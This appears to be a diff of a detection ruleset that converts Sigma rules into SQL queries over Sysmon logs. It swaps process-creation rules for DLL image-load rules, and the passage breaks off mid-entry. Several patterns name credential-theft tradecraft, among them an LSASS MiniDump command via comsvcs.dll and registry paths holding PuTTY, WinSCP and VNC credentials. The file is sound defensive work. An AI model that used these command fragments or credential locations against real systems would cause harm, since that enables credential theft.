- "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_gpscript.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "PowerShell Core DLL Loaded By Non PowerShell Process", + "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "status": "experimental", + "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "tags": [ + "attack.t1059.001", + "attack.execution" + ], "falsepositives": [ - "Administrative activity" + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR Image LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR Image LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR Image LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_dll_system_management_automation_susp_load.yml" }, { - "title": "Suspicious MsiExec Embedding Parent", - "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "title": "System Drawing DLL Load", + "id": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "author": "frack113", + "description": "Detects processes loading \"System.Drawing.ni.dll\". This could be an indicator of potential Screen Capture.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1218.007", - "attack.defense_evasion" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Unknown" + "False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((Image LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\System.Drawing.ni.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_embedding.yml" + "filename": "image_load_dll_system_drawing_load.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Potential Wazuh Security Platform DLL Sideloading", + "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_wazuh.yml" }, { - "title": "Enumeration for 3rd Party Creds From CLI", - "id": "87a476dc-0079-4583-a985-dee7a20a03de", - "status": "experimental", - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "status": "test", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "PUA - Adidnsdump Execution", - "id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", - "status": "test", - "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", - "author": "frack113", + "title": "Third Party Software DLL Sideloading", + "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%adidnsdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_python_adidnsdump.yml" + "filename": "image_load_side_load_third_party.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", - "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "title": "Unsigned Image Loaded Into LSASS Process", + "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", "status": "test", - "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", - "author": "@neu5ron", + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.persistence", - "attack.t1542.003" + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Valid user connecting using RDP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" ], - "filename": "proc_creation_win_bcdedit_susp_execution.yml" + "filename": "image_load_unsigned_image_loaded_into_lsass.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "status": "test", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", - "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "title": "VMGuestLib DLL Sideload", + "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "status": "experimental", + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Rare System Admin Activity" + "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND Image LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "image_load_side_load_vmguestlib.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", - "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CLR DLL Loaded Via Office Applications", + "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "status": "test", + 